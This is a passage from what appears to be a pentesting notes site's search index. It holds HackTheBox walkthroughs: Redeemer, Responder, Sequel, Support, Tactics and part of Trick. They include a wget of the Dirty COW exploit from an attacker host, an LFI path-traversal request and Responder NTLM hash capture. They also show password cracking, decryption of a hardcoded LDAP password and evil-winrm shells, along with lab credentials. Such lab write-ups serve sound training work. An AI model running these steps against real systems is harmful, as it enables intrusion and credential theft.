https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c\n   Comments: sudo configuration requires pwfeedback to be enabled.\n\n[+] [CVE-2017-6074] dccp\n\n   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3\n   Exposure: less probable\n   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}\n   Download URL: https://www.exploit-db.com/download/41458\n   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass\n\n[+] [CVE-2017-5618] setuid screen v4.5.0 LPE\n\n   Details: https://seclists.org/oss-sec/2017/q1/184\n   Exposure: less probable\n   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154\n

                        The second dirty cow works just fine: https://www.exploit-db.com/exploits/40839

                        Serve it from your attacker machine. And from victim's:

                        wget http://<atacker machine>/40839.c\n\n\n# Compile with:\ngcc -pthread 40839.c -o dirty -lcrypt\n\n# Then run the newly create binary by either doing:\n./dirty\n# or\n./dirty <my-new-password>\n

                        Now, sudo su to the given user from the script. And you will be that user (substituting root).

                        ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-redeemer/","title":"Walkthrough - A HackTheBox machine - Redeemer","text":"

                        Enumerate open ports/services:

                        nmap -sC -sV $ip -Pn -p-\n

                        Results:

                        ```PORT STATE SERVICE VERSION 6379/tcp open redis Redis key-value store 5.0.7

                        See [6379 Redis Cheat sheet](6379-redis.md).\n\n\n## Exploitation\n\n```bash\n\u2514\u2500$ redis-cli -h 10.129.136.187 -p 6379         \n10.129.136.187:6379> INFO keyspace\n# Keyspace\ndb0:keys=4,expires=0,avg_ttl=0\n(0.60s)\n10.129.136.187:6379> select 0\nOK\n10.129.136.187:6379> keys *\n1) \"temp\"\n2) \"numb\"\n3) \"flag\"\n4) \"stor\"\n10.129.136.187:6379> get flag\n\"03e1d2b376c37ab3f5319922053953eb\"\n

                        ","tags":["walkthrough","redis"]},{"location":"htb-responder/","title":"Responder - A HackTheBox machine","text":"
                        nmap -sC -A 10.129.95.234 -Pn -p-\n

                        Open ports: 80,

                        Browsing at port 80, we are redirected to http://unika.htb so we will add this to /etc/host.

                        sudo echo \"10.129.95.234    unika.htb\" >> /etc/hosts\n

                        After that, we can browse the web and wander around.

                        There is a LFI - Local File Inclusion vulnerability at endpoint http://unika.htb/index.php?page=french.html. This is request in Burpsuite:

                        GET /index.php?page=../../../../../../../../windows/win.ini HTTP/1.1\nHost: unika.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nReferer: http://unika.htb/index.php?page=french.html\nUpgrade-Insecure-Requests: 1\n

                        From previous responses we know that we face a php server version 8.1.1 running on Windows, so we can use some payloads for interesting windows files. In this case, we would need some crafting to remove the \"c:/\" part. We can do it with the \"cut\" command.

                        We are going to use the tool Responder.py to get the NTLM hash from server. Basically the idea is to mount a SMB server on our attacker machine with the responder tool. Responder is able to get the NTLM hash from server.

                        git clone https://github.com/lgandx/Responder.git   \ncd Responder\nsudo pip install -r requirements.txt\n./Responder.py -I tun1 -w -d\n

                        From browser enter: http://unika.htb//index.php?page=///whatever. In my case:

                        http://unika.htb/index.php?page=//10.10.14.2/lalala\n

                        Now, from the Responder prompt we will have the hash:

                        [SMB] NTLMv2-SSP Client   : 10.129.95.234\n[SMB] NTLMv2-SSP Username : RESPONDER\\Administrator\n[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:fc1a74919a1b08cc:E6E626FD4B1C4F7ECCAA0EE0840EE704:010100000000000000DC82F5CA7DD901B25F22A9A23BC4C3000000000200080042005A004F00340001001E00570049004E002D00500042004E004B00360051003400500058004E004F0004003400570049004E002D00500042004E004B00360051003400500058004E004F002E0042005A004F0034002E004C004F00430041004C000300140042005A004F0034002E004C004F00430041004C000500140042005A004F0034002E004C004F00430041004C000700080000DC82F5CA7DD9010600040002000000080030003000000000000000010000000020000091174BB6757D2A344D7B5A8B18DC80E22F176A01524CE0739D703C3593CB66640A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0032000000000000000000\n

                        The NetNTLMv2 includes both the challenge (random text) and the encrypted response.

                        # Save hash in a file\necho \"Administrator::RESPONDER:fc1a74919a1b08cc:E6E626FD4B1C4F7ECCAA0EE0840EE704:010100000000000000DC82F5CA7DD901B25F22A9A23BC4C3000000000200080042005A004F00340001001E00570049004E002D00500042004E004B00360051003400500058004E004F0004003400570049004E002D00500042004E004B00360051003400500058004E004F002E0042005A004F0034002E004C004F00430041004C000300140042005A004F0034002E004C004F00430041004C000500140042005A004F0034002E004C004F00430041004C000700080000DC82F5CA7DD9010600040002000000080030003000000000000000010000000020000091174BB6757D2A344D7B5A8B18DC80E22F176A01524CE0739D703C3593CB66640A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0032000000000000000000\" > hash.txt\n

                        Crack it with John the Ripper.

                        john -w=/usr/share/wordlists/rockyou.txt hash.txt\n

                        Results:

                        Using default input encoding: UTF-8\nLoaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])\nWill run 8 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nbadminton        (Administrator)     \n1g 0:00:00:00 DONE (2023-05-03 14:51) 50.00g/s 204800p/s 204800c/s 204800C/s 123456..oooooo\nUse the \"--show --format=netntlmv2\" options to display all of the cracked passwords reliably\nSession completed. \n

                        So password for Administrator is badminton.

                        Also, from Responder we have this output:

                        Using default input encoding: UTF-8\nLoaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])\nWill run 8 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nbadminton        (Administrator) \n

                        Now, we will connect to the WinRM (Windows Remote Management service) on the target and try to get a session. For that there is a tool called Evil-WinRM.

                        evil-winrm -i <VictimIP> -u <username> -p <password>\n\n# In my case: \nevil-winrm -i 10.129.95.234 -u Administrator -p badminton\n

                        You will get a powershell session. Browse around to find flag.txt.

                        To echo it:

                        type c:/users/mike/Desktop/flag.txt\n
                        ","tags":["walkthrough","NTLM credential stealing","responder.py","local file inclusion","php include","web pentesting"]},{"location":"htb-sequel/","title":"Sequel - A HackTheBox machine","text":"
                        nmap -sC -A 10.129.95.232 -Pn\n

                        Results:

                        Nmap scan report for 10.129.95.232\nHost is up (0.044s latency).\nNot shown: 999 closed tcp ports (conn-refused)\nPORT     STATE SERVICE VERSION\n3306/tcp open  mysql?\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1\n|   Thread ID: 91\n|   Capabilities flags: 63486\n|   Some Capabilities: SupportsLoadDataLocal, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsCompression, Support41Auth, Speaks41ProtocolOld, ConnectWithDatabase, FoundRows, SupportsTransactions, DontAllowDatabaseTableColumn, ODBCClient, IgnoreSigpipes, InteractiveClient, Speaks41ProtocolNew, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults\n|   Status: Autocommit\n|   Salt: d7$M6g&&+DSV7PkJptwz\n|_  Auth Plugin Name: mysql_native_password\n

                        Connect to database: mariadb

                        mariadb -h 10.129.95.232 -u root\n
                        MariaDB [(none)]> show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| htb                |\n| information_schema |\n| mysql              |\n| performance_schema |\n+--------------------+\n4 rows in set (0.049 sec)\n\nMariaDB [(none)]> use htb;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\nDatabase changed\n\n\nMariaDB [htb]> show tables;\n+---------------+\n| Tables_in_htb |\n+---------------+\n| config        |\n| users         |\n+---------------+\n2 rows in set (0.046 sec)\n\n\nMariaDB [htb]> show tables;\n+---------------+\n| Tables_in_htb |\n+---------------+\n| config        |\n| users         |\n+---------------+\n2 rows in set (0.047 sec)\n\n\nMariaDB [htb]> show columns from config;\n+-------+---------------------+------+-----+---------+----------------+\n| Field | Type                | Null | Key | Default | Extra          |\n+-------+---------------------+------+-----+---------+----------------+\n| id    | bigint(20) unsigned | NO   | PRI | NULL    | auto_increment |\n| name  | text                | YES  |     | NULL    |                |\n| value | text                | YES  |     | NULL    |                |\n+-------+---------------------+------+-----+---------+----------------+\n3 rows in set (0.046 sec)\n\n\nMariaDB [htb]> select id, name, value from config;\n+----+-----------------------+----------------------------------+\n| id | name                  | value                            |\n+----+-----------------------+----------------------------------+\n|  1 | timeout               | 60s                              |\n|  2 | security              | default                          |\n|  3 | auto_logon            | false                            |\n|  4 | max_size              | 2M                               |\n|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |\n|  6 | enable_uploads        | false                            |\n|  7 | authentication_method | radius                           |\n+----+-----------------------+----------------------------------+\n7 rows in set (0.046 sec)\n
                        ","tags":["walkthrough","sql","port 3306","mariadb"]},{"location":"htb-support/","title":"Walkthrough - Support, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-support/#about-the-machine","title":"About the machine","text":"data Machine Support Platform Hackthebox url link creator 0xdf OS Windows Release data 30 July 2022 Difficulty Easy Points 20 ip 10.10.11.174","tags":["walkthrough"]},{"location":"htb-support/#getting-usertxt-flag","title":"Getting user.txt flag","text":"

                        Run:

                        export ip=10.10.11.174\n
                        ","tags":["walkthrough"]},{"location":"htb-support/#reconnaissance","title":"Reconnaissance","text":"","tags":["walkthrough"]},{"location":"htb-support/#service-port-enumeration","title":"Service/ Port enumeration","text":"

                        Run nmap to enumerate open ports, services, OS, and traceroute. Do a general enumeration not to make too much noise:

                        sudo nmap $ip -Pn\n

                        Results:

                        Nmap scan report for 10.10.11.174\nHost is up (0.034s latency).\nNot shown: 989 filtered tcp ports (no-response)\nPORT     STATE SERVICE\n53/tcp   open  domain\n88/tcp   open  kerberos-sec\n135/tcp  open  msrpc\n139/tcp  open  netbios-ssn\n389/tcp  open  ldap\n445/tcp  open  microsoft-ds\n464/tcp  open  kpasswd5\n593/tcp  open  http-rpc-epmap\n636/tcp  open  ldapssl\n3268/tcp open  globalcatLDAP\n3269/tcp open  globalcatLDAPssl\n\nNmap done: 1 IP address (1 host up) scanned in 7.90 seconds\n

                        Once you know open ports, run nmap to see service versions and more details:

                        sudo nmap -sCV -p3,88,135,139,389,445,464,593,636,3268,3269 $ip\n

                        Results:

                        Nmap scan report for 10.10.11.174\nHost is up (0.034s latency).\n\nPORT     STATE SERVICE       VERSION\n53/tcp   open  domain        Simple DNS Plus\n88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-11-08 15:56:45Z)\n135/tcp  open  msrpc         Microsoft Windows RPC\n139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)\n445/tcp  open  microsoft-ds?\n464/tcp  open  kpasswd5?\n593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636/tcp  open  tcpwrapped\n3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)\n3269/tcp open  tcpwrapped\nService Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n| smb2-time:\n|   date: 2022-11-08T15:56:49\n|_  start_date: N/A\n| smb2-security-mode:\n|   3.1.1:\n|_    Message signing enabled and required\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 49.69 seconds\nzsh: segmentation fault  sudo nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269 $ip\n

                        A few facts that you can gather after running this scan are: + There is a Windows Server running an Active Directory LDAP in the machine. + ldap and kerberos are available. + Domain: support.htb0.

                        ","tags":["walkthrough"]},{"location":"htb-support/#enumerate","title":"Enumerate","text":"

                        Now, we can perform some basic enumeration to gather data about the target.

                        enum4linux 10.10.11.174\n

                        Among the lines in the results, you can see these interesting lines:

                        =========================================( Target Information )=========================================\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===================================( Session Check on 10.10.11.174 )===================================    \n[+] Server 10.10.11.174 allows sessions using username '', password ''\n\n================================( Getting domain SID for 10.10.11.174 )================================             \nDomain Name: SUPPORT                                                                     \nDomain Sid: S-1-5-21-1677581083-3380853377-188903654\n

                        Using the tool kerbrute, we will enumerate some valid usernames in the active directory:

                        (kali\u327fkali)-[~/tools/kerbrute/dist]\n\u2514\u2500$ ./kerbrute_linux_amd64 userenum -d support --dc 10.10.11.174 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt\n

                        Results:

                            __             __               __     \n   / /_____  _____/ /_  _______  __/ /____\n  / //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\\n / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/\n/_/|_|\\___/_/  /_.___/_/   \\__,_/\\__/\\___/                                        \n\nVersion: dev (9cfb81e) - 11/09/22 - Ronnie Flathers @ropnop\n\n2022/11/09 05:16:54 >  Using KDC(s):\n2022/11/09 05:16:54 >   10.10.11.174:88\n\n2022/11/09 05:16:56 >  [+] VALID USERNAME:  support@support\n2022/11/09 05:16:57 >  [+] VALID USERNAME:  guest@support\n2022/11/09 05:17:03 >  [+] VALID USERNAME:  administrator@support\n2022/11/09 05:17:52 >  [+] VALID USERNAME:  Guest@support\n2022/11/09 05:17:53 >  [+] VALID USERNAME:  Administrator@support\n2022/11/09 05:19:42 >  [+] VALID USERNAME:  management@support\n2022/11/09 05:19:59 >  [+] VALID USERNAME:  Support@support\n2022/11/09 05:20:52 >  [+] VALID USERNAME:  GUEST@support\n2022/11/09 05:31:02 >  [+] VALID USERNAME:  SUPPORT@support\n

                        The same thing we did with kerbrute, we could have done it with dnsrecon.

                        Samba service is open so we can try to enumerate the shares provided by the host:

                        # -L looks at what services are available on a target and -N forces the tool not to ask for a password\nsmbclient -L //$ip -N\n

                        Results:

                                Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Remote Admin\n        C$              Disk      Default share\n        IPC$            IPC       Remote IPC\n        NETLOGON        Disk      Logon server share\n        support-tools   Disk      support staff tools\n        SYSVOL          Disk      Logon server share\nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available\n
                        ","tags":["walkthrough"]},{"location":"htb-support/#initial-access","title":"Initial access","text":"

                        After trying to connect to ADMIN$, C$, we connect to the share \"support-tools\":

                        smbclient /\\\\10.10.11.174/\\support-tools\n

                        This way, we obtain a prompt command line in samba (smb: >). Typing help in that command line you can see which commands you can execute.

                        Also, we list the content in the folder:

                        dir\n

                        Results:

                        smb: \\> dir\n  .                                   D        0  Wed Jul 20 13:01:06 2022\n  ..                                  D        0  Sat May 28 07:18:25 2022\n  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022\n  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022\n  putty.exe                           A  1273576  Sat May 28 07:20:06 2022\n  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022\n  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022\n  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022\n  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022\n\n                4026367 blocks of size 4096. 968945 blocks available\n

                        Also, we check permissions on the share and we learn that we only have read permissions. Now we are going to retrieve all these files to pay close attention. Among the commands you can execute you have mget. So we run:

                        mget *\n

                        This will download all the files to the local folder from where you initiated your samba connection. Close the connection:

                        quit\n

                        Now, have a close look at the files we have downloaded. Unzip UserInfo.exe.zip file:

                        unzip UserInfo.exe.zip\n

                        After unzipping UserInfo.exe.zip, you have two files: UserInfo.exe and UserInfo.exe.config. Run:

                        cat UserInfo.exe.config\n

                        Result:

                        <?xml version=\"1.0\" encoding=\"utf-8\"?>\n<configuration>\n    <startup>\n        <supportedRuntime version=\"v4.0\" sku=\".NETFramework,Version=v4.8\" />\n    </startup>\n  <runtime>\n    <assemblyBinding xmlns=\"urn:schemas-microsoft-com:asm.v1\">\n      <dependentAssembly>\n        <assemblyIdentity name=\"System.Runtime.CompilerServices.Unsafe\" publicKeyToken=\"b03f5f7f11d50a3a\" culture=\"neutral\" />\n        <bindingRedirect oldVersion=\"0.0.0.0-6.0.0.0\" newVersion=\"6.0.0.0\" />\n      </dependentAssembly>\n    </assemblyBinding>\n  </runtime>\n</configuration>\n

                        From this, we can know that UserInfo.exe is a binary assembled with the .NETFramework. Basically, this executable appears to be used to pull user information, likely from Active Directory. Now, if we want to go further in our inspection we will need a .NET decompiler for Linux. Here we have several options.

                        Since it's open source and we are using a kali virtual machine to perform this penetration test, let's use ILSpy, but you can have a look at alternative tools at the end of this walkthrough. To run ILSpy, you need to install it before. Also, it has some dependencies like: .NET 6.0 SDK, Avalonia, dotnet... Install what you are asked and when done, run:

                        cd ~/tools/AvaloniaILSpy/artifacts/linux-x64\n./ILSpy\n

                        Open UserInfo.exe in the program and inspect the code. There are several parts in the code:

                        • References
                        • {}
                        • {} UserInfo
                        • {} UserInfo.Commands
                        • {} UserInfo.Services

                        In the UserInfo.Services you can find the LdadQuery():

                        using System.DirectoryServices;\n\npublic LdapQuery()\n{\n    //IL_0018: Unknown result type (might be due to invalid IL or missing references)\n    //IL_0022: Expected O, but got Unknown\n    //IL_0035: Unknown result type (might be due to invalid IL or missing references)\n    //IL_003f: Expected O, but got Unknown\n    string password = Protected.getPassword();\n    entry = new DirectoryEntry(\"LDAP://support.htb\", \"support\\\\ldap\", password);\n    entry.set_AuthenticationType((AuthenticationTypes)1);\n    ds = new DirectorySearcher(entry);\n}\n

                        From where we stand, we can understand that LdapQuery() function is used to login into the Active Directory with the user \"support\". As a password, it calls the getPassword() function. Let's click on that function in the code to see it:

                        public static string getPassword()\n{\n    byte[] array = Convert.FromBase64String(enc_password);\n    byte[] array2 = array;\n    for (int i = 0; i < array.Length; i++)\n    {\n        array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);\n    }\n    return Encoding.Default.GetString(array2);\n}\n

                        Here we can see the necessary steps that we will need to reverse the password if, in the end, we are able to retrieve it. Now, let's click on two function calls: \"enc_password\" and the private function \"key\".

                        # enc_password function\n// UserInfo.Services.Protected\nusing System.Text;\n\nprivate static string enc_password = \"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E\"\n
                        # private static byte[] key\n// UserInfo.Services.Protected\nusing System.Text;\n\nprivate static byte[] key = Encoding.ASCII.GetBytes(\"armando\");\n

                        With these two last elements, we can write a script to reverse the function getPassword() and ultimately obtain the password used for \"support\" user to access the Active Directory.

                        Save the script as script.py and this content:

                        import base64\n\nenc_password = \"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E\"\nkey = b'armando'\n\narray = base64.b64decode(enc_password)\narray2 = ''\nfor i in range(len(array)):\n    array2 += chr(array[i] ^ key[i%len(key)] ^ 223)\n\nprint(array2)\n\u00b4\u00b4\u00b4\n\nNow, give script.py execution permissions and run it:\n\n```bash\nchmod +x script.py\npython script.py\n

                        Decrypted password would be: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

                        Before going on, there is another way to get the password besides writing this python script. One of them, for instance, would involve:

                        1. Opening a windows machine in the tun0 network range.
                        2. Opening wireshark and capturing tun0 interface.
                        3. Running the executable UserInfo.exe from the windows machine.
                        4. Examining in wireshark the LDAP authentication packet (Follow TCP Stream in a request to port 389).

                        Summing up, we have:

                        • user: support
                        • password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
                        • ldap directory: support.htb

                        Now we can use a tool such as ldapsearch to open a connection to the LDAP server, bind, and perform a search using specified parameters, like:

                        -b searchbase   Use searchbase as the starting point for the search instead of the default.\n-x      Use simple authentication instead of SASL.\n-D binddn   Use the Distinguished Name binddn to bind to the LDAP directory.  For SASL binds, the server is expected to ignore this value.\n-w passwd       Use passwd as the password for simple authentication.\n-H ldapuri  Specify  URI(s)  referring  to  the  ldap  server(s); a list of URI, separated by whitespace or commas is expected\n

                        Using ldapsearch, we run:

                        # # ldapsearch -x -H ldap://$ip -D '<DOMAIN>\\<username>' -w '<password>' -b \"CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>\"\n\nldapsearch -x -H ldap://support.htb -D 'support\\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b \"CN=Users,DC=support,DC=htb\"\n

                        Results are long and provided in text form. By using a tool such as ldapdomaindump we can get cool results in different formats: .grep, .html, and .json.

                         ldapdomaindump -u 'support\\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' dc.support.htb\n

                        Then, we can run:

                        firefox domain_users.html\n

                        Results:

                        It looks like the support user account has the most permissions. We have a closer look to this user in the results obtained in the ldapsearch:

                        # support, Users, support.htb\ndn: CN=support,CN=Users,DC=support,DC=htb\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: support\nc: US\nl: Chapel Hill\nst: NC\npostalCode: 27514\ndistinguishedName: CN=support,CN=Users,DC=support,DC=htb\ninstanceType: 4\nwhenCreated: 20220528111200.0Z\nwhenChanged: 20221109173336.0Z\nuSNCreated: 12617\ninfo: Ironside47pleasure40Watchful\nmemberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb\nmemberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb\nuSNChanged: 81981\ncompany: support\nstreetAddress: Skipper Bowles Dr\nname: support\nobjectGUID:: CqM5MfoxMEWepIBTs5an8Q==\nuserAccountControl: 66048\nbadPwdCount: 0\ncodePage: 0\ncountryCode: 0\nbadPasswordTime: 0\nlastLogoff: 0\nlastLogon: 0\npwdLastSet: 132982099209777070\nprimaryGroupID: 513\nobjectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==\naccountExpires: 9223372036854775807\nlogonCount: 0\nsAMAccountName: support\nsAMAccountType: 805306368\nobjectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb\ndSCorePropagationData: 20220528111201.0Z\ndSCorePropagationData: 16010101000000.0Z\nlastLogonTimestamp: 133124888166969633\n

                        There! Usually, the field \"Info\" is left empty but in this case, you can read: \"Ironside47pleasure40Watchful\", which might be a credential. Assuming that it is, we are going to enumerate user information in AD through the LDAP protocol. And for that, there exists a tool called evil-winrm.

                        What does evil-winrm do? evil-winrm is a WinRM shell for hacking/penthesting purposes.

                        And what is WinRM? WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators. Download evil-winrm repo here.

                        Run:

                        evil-winrm -i dc.support.htb -u support -p \"Ironside47pleasure40Watchful\"\n

                        And we will connect to a powershell terminal: PS C:\\Users\\support\\Documents

                        To get the user.txt flag, run:

                        cd ..\ndir\ncd Desktop\ndir\ntype user.txt\n

                        Result:

                        561ec390613a0f53b431d3e14e923de6\n
                        ","tags":["walkthrough"]},{"location":"htb-support/#getting-the-systems-flag","title":"Getting the System's flag","text":"

                        Coming soon.

                        ","tags":["walkthrough"]},{"location":"htb-support/#tools-in-this-lab","title":"Tools in this lab","text":"

                        Before going through this write-up, you may have a look at some tools needed to solve it in case you prefer to investigate them and try harder instead of reading directly the solution.

                        kerbrute

                        Created by ropnop. Download repo. A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

                        Nicely done in go, so to install it first you need to make sure that go is installed. Otherwise, run:

                        sudo apt update && sudo apt install golang\n

                        Then, follow the instructions from the repo.

                        enum4linux

                        Preinstalled in a kali machine. Tool to exploit null sessions by using some PERL scripts. Some cool commands here:

                        # enumerates shares\nenum4linux -S $ip\n\n# enumerates users\nenum4linux -U $ip\nenum4linux -M $ip     // enumerates machine list\nenum4linux -enuP $ip   // displays the password policy in case you need to mount a network authentification attack\nenum4linux -u $ip     // specify username to use (default \u201c\u201d)\nenum4linux -p $ip    // specify password to use (default \u201c\u201d)\nenum4linux -s /usr/share/enum4linux/share-list.txt $ip    // Also you can use brute force by adding a file\n

                        dnspy

                        Created by a bunch of contributors. Download the repo. dnSpy is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available. There is a but: this tool is for windows

                        To install, open powershell in windows and run:

                        git clone --recursive https://github.com/dnSpy/dnSpy.git\ncd dnsSpy\nbuild.ps1 -NoMbuild\n

                        ILSpy

                        Open source alternative for dnspy. Download from repo; ILSpy. To install ILSpy, you need to install some dependencies like: .NET 6.0 SDK, Avalonia, dotnet... Install what you are asked and when done, run:

                        cd ~/tools/AvaloniaILSpy/artifacts/linux-x64\n./ILSpy\n
                        ","tags":["walkthrough"]},{"location":"htb-support/#what-i-learned","title":"What I learned","text":"

                        When doing Support Machine I was faced with some challenging missions:

                        Enumerating shares as part of a Null session attack.

                        A null session attack exploits an authentification vulnerability for Windows Administrative Shares. This lets an attacker connect to a local or remote share without authentification. Therefore, it lets an attacker enumerate precious info such as passwords, system users, system groups, running system processes... The challenge here was to choose the best-suited tools to perform this enumeration. On my mental repo, I had:

                        • Samba suite
                        • Enum4linux

                        But there is also a nmap script for smb enumeration.

                        Finding a .NET decompiler for Linux

                        There are well-known decompilers out there. For windows you have dnSpy and many more. In linux you have the open source ILSpy. BUT: Installation required some dependencies. There were more tools (wine).

                        Ldap enumerating tools

                        ldap-utils are preinstalled in kali, but before this lab, I didn't have had the chance to try them out.

                        ldapsearch

                        Syntax:

                        ldapsearch -x -H ldap://$ip -D '<DOMAIN>\\<username>' -w '<password>' -b \"CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>\"\n

                        An example:

                        ldapsearch -x -H ldap://dc.support.htb -D 'SUPPORT\\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b \"CN=Users,DC=SUPPORT,DC=HTB\" | tee ldap_dc.support.htb.txt\n

                        ldapdomaindump

                        I have enjoyed this tool for real! It's pretty straightforward and you get legible results. An example of how to run it:

                        ldapdomaindump -u 'support\\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' dc.support.htb\n
                        ","tags":["walkthrough"]},{"location":"htb-tactics/","title":"Tactics - A HackTheBox machine","text":"
                        nmap -sC -A 10.129.228.98  -Pn -p-\n

                        Results:

                        PORT    STATE SERVICE       VERSION\n135/tcp open  msrpc         Microsoft Windows RPC\n139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn\n445/tcp open  microsoft-ds?\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n|_clock-skew: -5s\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 7476/tcp): CLEAN (Timeout)\n|   Check 2 (port 63095/tcp): CLEAN (Timeout)\n|   Check 3 (port 16465/udp): CLEAN (Timeout)\n|   Check 4 (port 43695/udp): CLEAN (Timeout)\n|_  0/4 checks are positive: Host is CLEAN or ports are blocked\n| smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2023-05-02T10:26:04\n|_  start_date: N/A\n

                        Interesting part here is

                        smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n

                        This will allow us to use smbclient share enumeration withouth the need of providing a password when signing into the shared folder. For that we will use a well known user in Windows: Administrator.

                        smbclient -L 10.129.228.98 -U Administrator\n

                        Results:

                                Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Remote Admin\n        C$              Disk      Default share\n        IPC$            IPC       Remote IPC\n
                        smbclient \\\\\\\\10.129.228.98\\\\C$ -U Administrator\n

                        Flag is located at:

                        \\Users\\Administrator\\Desktop\\>flag.txt \n
                        ","tags":["walkthrough","windows","smb","port 445"]},{"location":"htb-trick/","title":"Walkthrough - Trick, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-trick/#about-the-machine","title":"About the machine","text":"data Machine Trick Platform Hackthebox url link creator Geiseric OS Linux Release data 18 June 2022 Difficulty Easy Points 20 ip 10.10.11.166","tags":["walkthrough"]},{"location":"htb-trick/#recon","title":"Recon","text":"

                        First, we run:

                        export ip=10.10.11.166\n
                        ","tags":["walkthrough"]},{"location":"htb-trick/#service-port-enumeration","title":"Service/ Port enumeration","text":"

                        Run nmap to enumerate open ports, services, OS and traceroute

                        General enumeration not to make too much noise:

                        sudo nmap $ip -Pn\n

                        Results:

                        Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-19 13:31 EDT\nNmap scan report for trick.htb (10.10.11.166)\nHost is up (0.15s latency).\nNot shown: 996 closed tcp ports (reset)\nPORT   STATE SERVICE\n22/tcp open  ssh\n25/tcp open  smtp\n53/tcp open  domain\n80/tcp open  http\n

                        Once you know open ports, run nmap to see service versions and more details:

                        nmap -sCV -p22,80,53,25 -oN targeted $ip\n

                        Results:

